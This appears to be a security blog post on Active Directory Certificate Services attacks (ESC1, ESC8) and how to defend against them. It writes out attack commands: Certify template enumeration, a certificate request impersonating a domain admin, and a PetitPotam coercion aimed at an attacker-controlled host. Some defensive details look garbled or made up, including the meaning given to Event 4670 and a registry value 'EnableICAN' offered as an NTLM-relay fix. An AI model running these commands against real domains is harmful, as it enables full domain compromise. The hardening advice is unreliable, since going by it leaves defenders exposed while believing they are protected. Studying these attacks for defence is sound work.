Listen to this Post
Introduction:
Active Directory Certificate Services (AD CS) has become a prime target for sophisticated attackers, enabling them to escalate privileges, forge credentials, and maintain persistence deep within a network. Understanding the mechanics of these attacks is no longer optional for modern cybersecurity professionals; it is a critical line of defense for protecting core identity infrastructure.
Learning Objectives:
- Understand the core AD CS vulnerabilities and common attack vectors like ESC1 and ESC8.
- Learn to implement detective controls using Splunk and other tools to identify malicious certificate activity.
- Master the mitigation strategies and hardening techniques to secure your PKI environment.
You Should Know:
1. Enumerating Vulnerable Certificate Templates with Certify
Attackers first need to discover certificate templates that allow for domain escalation. Tools like Certify automate this discovery.
Command:
Certify.exe find /vulnerable
Step-by-step guide:
This command, executed from a compromised user context, queries the Active Directory Certificate Authority (CA). It lists all certificate templates, highlighting those with configurations that make them susceptible to abuse, such as templates that allow low-privilege users to enroll, specify a manager approval, or permit client authentication. The output will clearly identify templates vulnerable to techniques like ESC1, which allows for authentication as any user if the `ENROLLEE_SUPPLIES_SUBJECT` flag is misconfigured.
2. Requesting a Malicious Certificate with Certify
Once a vulnerable template is identified, an attacker can request a certificate that grants them elevated privileges.
Command:
Certify.exe request /ca:dc.domain.com\ca-name /template:VulnerableWebServer /altname:domainadmin
Step-by-step guide:
This command submits a certificate request to the specified CA (/ca:dc.domain.com\ca-name) for the vulnerable template (/template:VulnerableWebServer). The critical parameter is /altname:domainadmin, which exploits the template’s misconfiguration to insert an alternative subject name. The returned certificate can then be used with tools like Rubeus to request a Ticket-Granting-Ticket (TGT) for the “domainadmin” account, effectively granting the attacker that user’s privileges.
3. Detecting Certificate Theft with Windows Security Logs
Detecting the theft of a certificate’s private key is crucial for identifying a potential attack in progress.
Command (Splunk SPL):
index=windows EventCode=4670 | table _time, SubjectUserName, ProcessName, ObjectName
Step-by-step guide:
Windows Event ID 4670 is generated when a user performs a backup operation on a private key. This query in Splunk will surface all such events, displaying the time, user who performed the action, the process used, and the name of the certificate key. A sudden spike in these events, especially from unexpected users or processes like `certsrv.msc` or certutil.exe, is a high-fidelity indicator of credential theft activity.
4. Exploiting ESC8 with PetitPotam
The ESC8 vulnerability abuses the AD CS Web Enrollment service, acting as a relay to force the domain controller to authenticate to an attacker-controlled machine.
Command:
python3 PetitPotam.py -d domain.com -u user -p password attacker.ip dc.domain.com
Step-by-step guide:
This Python script targets the domain controller (dc.domain.com). It tricks the DC into connecting to the attacker’s machine (attacker.ip) via the WebClient service. The attacker’s machine, running a tool like Impacket’s ntlmrelayx.py, relays the captured authentication attempt to the AD CS web enrollment port (HTTP/80). This can force the DC to request a certificate for itself, which the attacker can then use for full domain compromise.
5. Hardening Against NTLM Relay Attacks (ESC8 Mitigation)
The primary mitigation for ESC8 is to disable NTLM authentication on the AD CS web enrollment service, forcing the use of Kerberos, which is not relayable.
Command (Windows Registry):
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\HTTP\Parameters /v EnableICAN /t REG_DWORD /d 0
Step-by-step guide:
This registry command disables Integrated Windows Authentication (IWA) on the IIS server, which is a prerequisite for the PetitPotam relay attack. The change requires a restart of the IIS service (iisreset /noforce). It is a critical hardening step but should be tested in a development environment first, as it may impact legacy applications that rely on IWA.
6. Enabling Certificate Enrollment Auditing
To detect malicious enrollment requests, you must first enable the relevant auditing policies in Windows.
Command (Group Policy – Audit Policy):
Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Object Access -> "Audit Certification Services" (Success and Failure)
Step-by-step guide:
Navigate to the Group Policy Management Editor on your domain controller or a policy linked to your CA servers. Enable the “Audit Certification Services” policy for both success and failure. Once applied, this will generate Event ID 4886 (certificate enrollment request) and 4887 (certificate issuance) in the Windows Security log, providing a detailed audit trail for all certificate-related activities.
7. Configuring CA Security Settings to Restrict Enrollment
Proactively hardening the CA itself by modifying template permissions is a fundamental mitigation.
Command (via `certtmpl.msc` GUI):
1. Open `certtmpl.msc`.
- Right-click a template (e.g.,
User) and selectProperties.
3. Go to the `Security` tab.
- Ensure that only authorized groups (e.g.,
Domain Admins, specific security groups) have Enroll permissions. Remove Enroll from broad groups like Authenticated Users where possible.
Step-by-step guide:
This graphical tool is the standard for managing certificate templates. The principle of least privilege is paramount. By removing enroll permissions from “Authenticated Users” on highly privileged templates and granting them only to specific, necessary security groups, you drastically reduce the attack surface. This directly counters attacks that rely on abusing template misconfigurations available to any domain user.
What Undercode Say:
- The abuse of AD CS represents a fundamental shift toward attacking identity and trust services, moving beyond traditional credential dumping.
- Defenders must assume their PKI is a primary target and implement a strategy of continuous monitoring and hardening, as many environments have vulnerable configurations by default.
The analysis from the original Splunk deep dive and subsequent community research confirms that AD CS abuse is not a fleeting trend but a mature attack methodology. Its prevalence in both red team exercises and real-world intrusions underscores a widespread gap in defensive postures. Many organizations built their PKI infrastructure years ago with default, permissive settings that are now being weaponized. The defensive playbook is clear: comprehensive auditing to establish a baseline, aggressive hardening of templates and services, and deploying targeted detections for known TTPs. The challenge lies not in a lack of tools, but in the operational rigor required to manage these critical identity systems proactively.
Prediction:
The evolution of AD CS attacks will continue to outpace default enterprise configurations. We predict a rise in fileless, “living-off-the-land” techniques that use native Windows tools like `certreq.exe` and `certutil.exe` for these attacks, making detection even more challenging. Furthermore, as cloud-based PKI services gain adoption, attackers will pivot to find analogous misconfigurations and trust abuses in hybrid and cloud-native identity systems, making the lessons learned from defending on-premises AD CS more valuable than ever.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Michaelahaag Breaking – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
